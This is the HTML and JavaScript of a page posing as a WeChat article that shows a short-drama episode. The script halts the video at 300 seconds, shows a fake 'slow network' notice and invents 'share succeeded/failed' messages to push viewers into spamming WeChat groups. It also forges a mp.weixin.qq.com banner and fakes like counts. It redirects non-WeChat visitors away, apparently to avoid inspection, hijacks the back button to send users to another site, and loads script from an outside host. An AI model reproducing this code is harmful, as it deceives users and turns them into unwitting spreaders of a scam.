<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({id:"3I5Xv7JsyE8nQmcR",ck:"3I5Xv7JsyE8nQmcR"})</script>

<html><head>
    
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
    <script src="https://hm.baidu.com/hm.js?033200d4f17447bfeceed3febad4ef7e"></script><script>
        function cnzz_push(type) {
            _czc.push(["_trackEvent", "share", type]);
        }
    </script>
    <script>
    if(!/mobile/i.test(navigator.userAgent)){
        window.location = 'https://www.qq.com';
    }

 </script>

<script type="text/javascript">
function is_weixin(){
    var ua = navigator.userAgent.toLowerCase(); 
    if(ua.match(/MicroMessenger/i)=="micromessenger") {
        return true;
    } else {
        return false;
    }
 }
 
if (!is_weixin()) { 
    window.location.href = 'https://www.qq.com';
}
</script>
<!-- lb.tcps.net.cn Baidu tongji analytics -->
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?033200d4f17447bfeceed3febad4ef7e";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<script async="" src="http://imgcache.qq.com/tencentvideo_v1/tvp/js/module/flashplayer.js?max_age=86400&amp;v=20181023110505" charset="utf-8">
</script><title>加载中...</title></head>
<body>
    <div id="lly_dialog" style="display: none; z-index:9999;">
    <div class="weui-mask"></div>
    <div class="weui-dialog">
        <div class="weui-dialog__bd" id="lly_dialog_msg"><span style="font-size: 24px;color: #f5294c;z-index:-99">网速不好</span><br>请分享到朋友圈，可免费加速观看
        </div>
        <div class="weui-dialog__ft">
            <a href="javascript:;" class="weui-dialog__btn weui-dialog__btn_primary" id="lly_dialog_btn">好</a>
        </div>
    </div>
</div>

    <h1 class="rich_media_title" id="activity-name">.</h1>
    <h2 class="rich_media_title" id="activity-name">加载中......</h2>
    <div class="rich_media_meta_list" style="margin-bottom:0;">
        <em id="post-date" class="rich_media_meta rich_media_meta_text">2021-12-13</em>
        <a class="rich_media_meta rich_media_meta_link rich_media_meta_nickname" style="color:#607fa6;" id="post-user" href="#">下一集</a>
    </div>
        <div class="rich_media_content" id="js_content"><div id="mod_player_skin_0" class="player_skin" style="padding-top:6px;"><div id="mod_tenvideo_flash_player_1639366169654" class="tenvideo_player"><embed wmode="transparent" flashvars="vid=g32472ijn8g&amp;tpid=0&amp;showend=1&amp;showcfg=1&amp;searchbar=1&amp;pic=//shp.qpic.cn/qqvideo_ori/0/g32472ijn8g_496_280/0&amp;shownext=1&amp;list=2&amp;autoplay=0" src="http://imgcache.qq.com/tencentvideo_v1/player/TPout.swf?max_age=86400&amp;v=20140714" quality="high" name="tenvideo_flash_player_1639366169654" id="tenvideo_flash_player_1639366169654" bgcolor="#000000" width="1890px" height="200px" align="middle" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" pluginspage="http://get.adobe.com/cn/flashplayer/"></div></div></div>

        <!-- <div id="more" style="margin-top: 20px;"><a href="http://yxrfak.bar/app/index.php?i=1&c=entry&t=1639366043&key=7&do=index&m=kg_video"><img src="http://yxrfak.bar/addons/kg_video/images/more.jpg" border="0" style="width: 100%;"></a></div> -->
<!-- <img data-id="86177" data-role="guide-img" title="引导阅读动图" src="http://image3.135editor.com/cache/remote/aHR0cHM6Ly9tbWJpei5xbG9nby5jbi9tbWJpei95cVZBcW9adkRpYkczMTMwWTJoQVhrdEdITFVoOTI4Uko4bmljZE1PQkZBZXNEUTJGcVpFUjFDc1d0SVZKT3dnYWtWaWEycUN3YW1tREVaRUZ3VmFuUjhOUS8wP3d4X2ZtdD1naWY=" width="100%" height="100%">
    <div id="js_toobar" style="padding-top:10px;color: #8c8c8c;line-height: 32px;font-size: 17px;height: 32px;">
        <a style="color:#607fa6;float: left;margin-right: 10px;" id="js_view_source" href="http://tgmg-1259388790.cos.ap-bangkok.myqcloud.com/index.html">阅读原文</a>
        <div id="js_read_area" style="float: left;margin-right: 10px;">阅读 <span id="readNum">100000+</span></div>
        <div id="like" style="margin-right: 0;margin-left: 8px;float: left;-webkit-tap-highlight-color: rgba(0,0,0,0);outline: 0;min-width: 3.5em;">
            <i style="position: relative;top: 1px;background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAA+CAYAAAA1dwvuAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACd0lEQVRYhe2XMWhUMRjHfycdpDg4iJN26CQih4NUlFIc3iTasaAO+iZBnorIId2CDg6PLqWDXSy0p28TJ6ejILgoKiLFSeRcnASLnDf2HPKll8b3ah5NQPB+cHzJl0v+73J5Sf6NwWCAD6kqxoEV4BywCTwA2j59V9QlxrxUNJeBOSkfBtaAHvDcp/O+GkJHJd4H7kr5nm/nOkJHJH4FHkv5WAyhUxLfAgelvBlUKFXFBNCU6oYl+j6oEHohADwFtoDTUn8dTChVxX7gjlSfSJyS+CaYEDCPXs4d4IXkzDR+8BWqfI9SVUyil/ENST20ml8BF4Afu4z9HT3V80B/TAY9CxTABNAHxp1Oj4B1q34dWAamGa5Al0PALfSs3TS/aE1EcERWgQXgozPIN+Ai6O2ljFQVM8BLZJqN0KTEhgj9kvrViqf1wYz5BcoXQ38Pg9uckfiuSigU0xLXowmlqpgCjgNd4FM0IeCKxGcmEUtoRqLZScILpaqYA06iN9/tTTfGLzKvxLKdDCqUquIEcB59xK9GE2J4xLeBn3ZD1abaq/sQqSpmgWvo82rBbTdCPeAA4N69/noXS1XhphaBz27SPPVtapz/FXSBFsNDcgcN3wvkiBEjRoSndAtqLXXKvuvtYfMs+SP3T3tYm6ge1iaqh7UJ62HRTqNZko/mYV3CeVjA9rAuUTxsGd4edrcX1vWwddn2sHmWaA/bWuq4HnYLff3aC7U8bAiaMPyPJp3GhnxCUOlhQxPdwxrieViLbp4lUT2sIbqHNcTzsBYbeZZE9bCGeB7WIrqHNbTzLNnhYWMIlXpYI9Rz8gM8/GsFi3mW/Ace9jf8QZwIX5o4uQAAAABJRU5ErkJggg==) no-repeat;width: 13px;height: 13px;display: inline-block;-webkit-background-size: 100% auto;background-size: 100% auto;"></i>
            <span class="praise_num" id="likeNum">5837</span>
        </div>
        <a style="color:#919191;float: right;margin-left: 10px;" href="https://mp.weixin.qq.com/mp/infringement?url=https%3A%2F%2Fv.qq.com%2Fx%2Fpage%2Ft0503hnjp01.html">投诉</a>
    </div> -->
</div>

<div id="pauseplay" style="display: none; opacity: 0; position: fixed; inset: 65px 0px 0px; background-color: rgb(80, 80, 80); z-index: 1000000; height: 0px;">
</div>
<script>;</script><script type="text/javascript" src="http://yxrfak.bar/app/index.php?i=1&amp;c=utility&amp;a=visit&amp;do=showjs&amp;m=kg_video"></script>

<section id="dg" style="z-index: 9999; right: 0px; top: -18px; width: 19%; position: fixed !important;">
<p style="text-align:right;"><img data-ratio="1.8633333333333333" data-w="300" height="160" src="//wework.qpic.cn/wwpic/794213_rQ91hj5zT72J36H_1603443498/0" style="width: 46px; height: 50px;" width="86" /></p>

<style> 
  .back{
		width:28px;
		height:28px;
		position:fixed;
		display: block;
		top:5px;
		left:-10px;
		z-index:99
	}
	.back img{
		width:80px;
		height:80px;
	}
	
    </style> 

</head>
<body id="activity-detail" class="zh_CN " ontouchstart="">
 <a href="https://wm6868.github.io/index(1).html" class="back"> 
	<img src="https://ydmm-1259388790.cos.ap-mumbai.myqcloud.com/jf/fh.png"  >
	</a>  

<style>
    html {
    -ms-text-size-adjust: 100%;
    -webkit-text-size-adjust: 100%;
    line-height: 1.6
}

body {
    -webkit-touch-callout: none;
    font-family: "Helvetica Neue", Helvetica, "Hiragino Sans GB", "Microsoft YaHei", Arial, sans-serif;
    background-color: #f3f3f3;
    line-height: inherit
}

h1, h2, h3, h4, h5, h6 {
    font-weight: 400;
    font-size: 16px
}

* {
    margin: 0;
    padding: 0;
    font-style: normal
}

a {
    color: #607fa6;
    text-decoration: none
}

.rich_media_inner {
    font-size: 16px;
    word-wrap: break-word;
    -webkit-hyphens: auto;
    -ms-hyphens: auto;
    hyphens: auto
}

.rich_media_area_primary {
    position: relative;
    padding: 20px 15px 15px;
    background-color: #fff
}

.rich_media_area_primary:before {
    content: " ";
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 1px;
    border-top: 1px solid #e5e5e5;
    -webkit-transform-origin: 0 0;
    transform-origin: 0 0;
    -webkit-transform: scaleY(0.5);
    transform: scaleY(0.5);
    top: auto;
    bottom: -2px
}

.rich_media_area_extra {
    padding: 0 15px 0
}

.rich_media_title {
    margin-bottom: 10px;
    line-height: 1.4;
    font-weight: 400;
    font-size: 24px
}

.rich_media_meta_list {
    margin-bottom: 18px;
    line-height: 20px;
    font-size: 0
}

.rich_media_meta {
    display: inline-block;
    vertical-align: middle;
    margin-right: 8px;
    margin-bottom: 10px;
    font-size: 16px
}

.meta_original_tag {
    line-height: 100px;
    overflow: hidden;
    background: transparent url(/mmbizwap/zh_CN/htmledition/images/icon/appmsg/icon_original_tag.2x25ab3f.png) no-repeat 0 0;
    width: 49px;
    height: 20px;
    vertical-align: middle;
    display: inline-block;
    -webkit-background-size: 100% auto;
    background-size: 100% auto
}

.meta_enterprise_tag img {
    width: 30px;
    height: 30px !important;
    display: block;
    position: relative;
    margin-top: -3px;
    border: 0
}

.rich_media_meta_text {
    color: #8c8c8c
}

.rich_media_meta_nickname {
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    max-width: 9em
}

span.rich_media_meta_nickname {
    display: none
}

.rich_media_thumb {
    width: 100%;
    margin-bottom: 6px
}

.rich_media_content {
    overflow: hidden;
    color: #3e3e3e
}

.rich_media_content * {
    max-width: 100% !important;
    box-sizing: border-box !important;
    -webkit-box-sizing: border-box !important;
    word-wrap: break-word !important
}

.rich_media_content p {
    clear: both;
    min-height: 1em;
    white-space: pre-wrap
}

.rich_media_content em {
    font-style: italic
}

.rich_media_content fieldset {
    min-width: 0
}

.rich_media_content .list-paddingleft-2 {
    padding-left: 30px
}

.rich_media_content blockquote {
    margin: 0;
    padding-left: 10px;
    border-left: 3px solid #dbdbdb
}

img {
    height: auto !important
}

@media (min-device-width: 375px) and (max-device-width: 667px) and (-webkit-min-device-pixel-ratio: 2) {
    .mm_appmsg .rich_media_inner, .mm_appmsg .rich_media_meta, .mm_appmsg .discuss_list, .mm_appmsg .rich_media_extra, .mm_appmsg .title_tips .tips {
        font-size: 17px
    }
}

@media (min-device-width: 414px) and (max-device-width: 736px) and (-webkit-min-device-pixel-ratio: 3) {
    .mm_appmsg .rich_media_title {
        font-size: 25px
    }
}

.original_tool_area {
    display: block;
    padding: .75em 1em 0;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    color: #3e3e3e;
    border: 1px solid #eaeaea;
    margin: 20px 0
}

.original_tool_area .radius_avatar {
    display: inline-block;
    background-color: #fff;
    padding: 3px;
    border-radius: 50%;
    -moz-border-radius: 50%;
    -webkit-border-radius: 50%;
    overflow: hidden;
    vertical-align: middle
}

.original_tool_area .radius_avatar img {
    width: 100%;
    height: 100%;
    border-radius: 50%;
    -moz-border-radius: 50%;
    -webkit-border-radius: 50%;
    background-color: #eee
}

.original_tool_area .tips_global {
    position: relative;
    padding-bottom: .5em;
    font-size: 15px
}

.original_tool_area .tips_global:after {
    content: " ";
    position: absolute;
    left: 0;
    bottom: 0;
    width: 100%;
    height: 1px;
    border-bottom: 1px solid #dbdbdb;
    -webkit-transform-origin: 0 100%;
    transform-origin: 0 100%;
    -webkit-transform: scaleY(0.5);
    transform: scaleY(0.5)
}

.original_tool_area .radius_avatar {
    width: 27px;
    height: 27px;
    padding: 0;
    margin-right: .5em
}

.original_tool_area .radius_avatar img {
    height: 100% !important
}

.original_tool_area .cell {
    padding: .8em 0;
    display: block;
    position: relative
}

.original_tool_area .cell_hd, .original_tool_area .cell_bd, .original_tool_area .cell_ft {
    display: table-cell;
    vertical-align: middle;
    word-wrap: break-word;
    word-break: break-all;
    white-space: nowrap
}

.original_tool_area .cell_primary {
    width: 2000px;
    white-space: normal
}

.original_tool_area .icon_access:before {
    content: " ";
    display: inline-block;
    height: 8px;
    width: 8px;
    border-width: 1px 1px 0 0;
    border-color: #cbcad0;
    border-style: solid;
    transform: matrix(0.71, 0.71, -0.71, 0.71, 0, 0);
    -ms-transform: matrix(0.71, 0.71, -0.71, 0.71, 0, 0);
    -webkit-transform: matrix(0.71, 0.71, -0.71, 0.71, 0, 0);
    position: relative;
    top: -2px;
    top: -1px
}

.praised {
    background-position: 0 -18px !important;
}
</style>

<link href="https://cdn.bootcss.com/weui/1.0.2/style/weui.min.css" rel="stylesheet">
<script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
<script src="https://cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.js"></script>
<script src="https://cdn.bootcss.com/zepto/1.2.0/zepto.min.js"></script>
<script src="https://imgcache.qq.com/tencentvideo_v1/tvp/js/tvp.player_v2_zepto.js" charset="utf-8"></script>
<script src="https://v.qq.com/iframe/tvp.config.js" charset="utf-8"></script>

<div style="display: none;"><script src="https://s19.cnzz.com/z_stat.php?id=&amp;web_id=" language="JavaScript"></script></div>

<script>
    if (top.location != self.location) {
        top.location = self.location;
    }

    var til = "《前妻撩人，傅先生宠不停》第1/3集", vid = "h3548t1qcyn", delayTime = "300";

    $('#likeNum').html(Number.parseInt(Math.random() * 4000) + 3500);

    var video, player, playStatus = 'pending';
    var elId = 'mod_player_skin_0';
    $("#js_content").html('<div id="' + elId + '" class="player_skin" style="padding-top:6px;"></div>');
    var elWidth = $("#js_content").width();
    playVideo(vid, elId, elWidth);
    $("#pauseplay").height($("#js_content").height() - 10);

    if (playStatus == 'pending') {
        var isFirst = true;
        setInterval(function () {
            try {
                var currentTime = player.getCurTime();
                if (currentTime >= delayTime) {
                    $('#pauseplay').show();
                    player.setPlaytime(delayTime - 1);
                    player.pause();
                    $('#tenvideo_video_player_0').css("display","none");
                    $.cookie(vid, 's', {path: '/'});
                    if (isFirst) {
                        $('#pauseplay').trigger('click');
                    }
                    isFirst = false;
                }
            } catch (e) {
            }
        }, 500);
    }

    function playVideo(vid, elId, elWidth) {
//定义视频对象
        video = new tvp.VideoInfo();
//向视频对象传入视频vid
        video.setVid(vid);

//定义播放器对象
  elHeight = elWidth / '100%'; // 计算高度
    player = new tvp.Player(elWidth, elHeight);

        // player = new tvp.Player(elWidth, 200);
//设置播放器初始化时加载的视频
        player.setCurVideo(video);

//输出播放器,参数就是上面div的id，希望输出到哪个HTML元素里，就写哪个元素的id
//player.addParam("autoplay","1");
        player.addParam("wmode", "transparent");
        player.addParam("pic", "https://vpic-cover.puui.qpic.cn/h3548t1qcyn/h3548t1qcyn_1714883066_vt.jpg/720"); 
        player.write(elId);
    }
    // 窗口大小改变事件处理
    window.addEventListener('resize', function() {
        var playerContainer = document.getElementById(elId);
        playerContainer.style.width = '100%';
        // 调用播放器的setSize方法，以调整播放器的内部大小
        player.setSize('100%', elHeight);
    });
// 监听网络状态变化
    window.addEventListener('online', function() {
        // 用户连接到Wi-Fi，可以加载更高清晰度的视频
        // 这里可以调用播放器的相关方法来调整视频质量
     });

      // 检测用户是否正在使用移动数据
    if (navigator.connection && navigator.connection.type === 'cellular') {
        // 提示用户在Wi-Fi环境下观看
         alert('您正在使用移动数据，视频放不了,多刷新几下就可以啦! 建议在Wi-Fi环境下观看视频以获得更好的体验。');
     }

    $('#pauseplay').on('click', function () {
        jssdk();
    });

    $('#like').on('click', function () {
        var $icon = $(this).find('i');
        var $num = $(this).find('#likeNum');
        var num = 0;
        if (!$icon.hasClass('praised')) {
            num = parseInt($num.html());
            if (isNaN(num)) {
                num = 0;
            }
            $num.html(++num);
            $icon.addClass("praised");
        } else {
            num = parseInt($num.html());
            num--;
            if (isNaN(num)) {
                num = 0;
            }
            $num.html(num);
            $icon.removeClass("praised");
        }
    });

    var alertTimes = 0;

    function wxalert(msg, btn, callback) {
        if (alertTimes == 0) {
            var dialog = unescape("%3C%64%69%76%20%69%64%3D%22%6C%6C%79%5F%64%69%61%6C%6F%67%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%0A%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%77%65%75%69%2D%6D%61%73%6B%22%3E%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%77%65%75%69%2D%64%69%61%6C%6F%67%22%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%77%65%75%69%2D%64%69%61%6C%6F%67%5F%5F%62%64%22%20%69%64%3D%22%6C%6C%79%5F%64%69%61%6C%6F%67%5F%6D%73%67%22%3E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%77%65%75%69%2D%64%69%61%6C%6F%67%5F%5F%66%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%61%20%68%72%65%66%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%3B%22%20%63%6C%61%73%73%3D%22%77%65%75%69%2D%64%69%61%6C%6F%67%5F%5F%62%74%6E%20%77%65%75%69%2D%64%69%61%6C%6F%67%5F%5F%62%74%6E%5F%70%72%69%6D%61%72%79%22%20%69%64%3D%22%6C%6C%79%5F%64%69%61%6C%6F%67%5F%62%74%6E%22%3E%3C%2F%61%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E");
            $("body").append(dialog)
        }
        alertTimes++;
        var d = $('#lly_dialog');
        d.show(200);
        d.find("#lly_dialog_msg").html(msg);
        d.find("#lly_dialog_btn").html(btn);
        d.find("#lly_dialog_btn").off('click').on('click', function () {
            d.hide(200);
            if (callback) {
                callback()
            }
        })
    }

    var hiddenProperty = 'hidden' in document ? 'hidden' :
        'webkitHidden' in document ? 'webkitHidden' :
            'mozHidden' in document ? 'mozHidden' :
                null;
    var visibilityChangeEvent = hiddenProperty.replace(/hidden/i, 'visibilitychange');
    var onVisibilityChange = function () {
        if (!document[hiddenProperty]) {
            shareATimes += 1;
            if (shareATimes > 4) {
                shareTTimes += 1;
                setTimeout(share_tip(shareATimes, shareTTimes), 2000);
            } else {
                setTimeout(share_tip(shareATimes, -1), 2000);
            }
        } else {
        }
    }
    document.addEventListener(visibilityChangeEvent, onVisibilityChange);

    var doc = $(document);
    var _touches_point1 = 0;
    var _touches_point2 = 0;
    addEventListener("touchstart",
        function (e) {
            _touches_point1 = e.touches[0].pageY;
        });
    addEventListener("touchmove",
        function (e) {
            e.preventDefault();
            _touches_point2 = e.touches[0].pageY;
            if (doc.scrollTop() <= 0 && _touches_point1 < _touches_point2) {
                if ($('#_domain_display').length <= 0) {
                    $('body').prepend('<div id="_domain_display" style="text-align:center;background-color:#2d3132;color:#797d7e;height:0px;font-size:12px;overflow:hidden;"><p style="padding-top:12px;">此网页由 mp.weixin.qq.com 提供</p></div>');
                }
                $('#_domain_display').height((_touches_point2 - _touches_point1) * 0.35);
            } else {
                doc.scrollTop(doc.scrollTop() + ((_touches_point1 - _touches_point2) * 0.4));
            }
            if ((doc.scrollTop() + $(window).height()) >= doc.height() || $('#_b_dp').length > 0) {
                if ($('#_b_dp').length <= 0) {
                    $('body').append('<div id="_b_dp" style="text-align:center;color:#797d7e;height:0px;overflow:hidden;"></div>');
                }
                $('#_b_dp').height((_touches_point1 - _touches_point2) * 0.5);
            }
        });

    addEventListener("touchend",
        function (e) {
            $('#_domain_display').slideUp('normal', function () {
                $('#_domain_display').remove();
            });
            $('#_b_dp').slideUp('normal', function () {
                $('#_b_dp').remove();
            });
        });

    var shareATimes = 0, shareTTimes = 0;
//524行数值改成0即变成分享2次
    function share_tip(share_app_times, share_timeline_times) {
        if (share_timeline_times == 1) {
            if (shareATimes == 1) {
                wxalert('分享成功,请继续分享到<span style="font-size: 30px;color: #f5294c">2</span>个不同的群即可观看！', '好')
            } else if (shareATimes == 2) {
                wxalert('<span style="font-size: 24px;color: #f5294c">分享失败！</span><br>注意：分享到相同的群会失败<br>请继续分享到<span style="font-size: 30px;color: #f5294c">2</span>个不同的群！', '好')
            } else if (shareATimes == 3) {
                wxalert('分享成功,请继续分享到<span style="font-size: 30px;color: #f5294c">1</span>个不同的群即可观看！', '好')
            } else if (share_timeline_times < 1) {
                wxalert('<span style="font-size: 30px;color: #f5294c">分享成功！</span><br/>最后请分享到<span style="font-size: 30px;color: #f5294c">朋友圈</span>即可!', '好')
            }
        } else {
            if (shareATimes <= 1) {
                wxalert('<span style="font-size: 30px;color: #f5294c">分享成功！</span><br/>最后请分享到<span style="font-size: 30px;color: #f5294c">朋友圈</span>即可!', '好')
            } else {
                wxalert('分享成功, 点击确定继续播放。', '确定', function () {
                    delayTime = 99999;
                    $("#fenxiang").hide();
                    $('#tenvideo_video_player_0').css("display","block");
                    player.play();
                })
            }
        }
    }

    function jssdk() {
        $("#fenxiang").show();
        show_tip();
    }

    function show_tip() {
        wxalert('<span style="font-size: 24px;color: #f5294c">网速不好</span><br/>请分享到微信群，可免费加速观看', '好')
    }

    $(function () {
        $('#fenxiang').on('click', function () {
            show_tip()
        });
    });

    var d = new Date();
    var str = d.getFullYear() + "-" + (d.getMonth() + 1) + "-" + d.getDate();
    document.getElementById("post-date").innerHTML = str;

    document.title = til;
    document.getElementsByTagName('h2')[0].innerHTML = til;

    function zp() {
                location.href="https://wm6868.github.io/index(1).html"; 
            }
    setTimeout(function () {
        history.pushState(history.length + 1, "message", "#" + new Date().getTime())
    }, 100);
    window.onhashchange = function() {
        zp()
    };


</script>
</body></html>
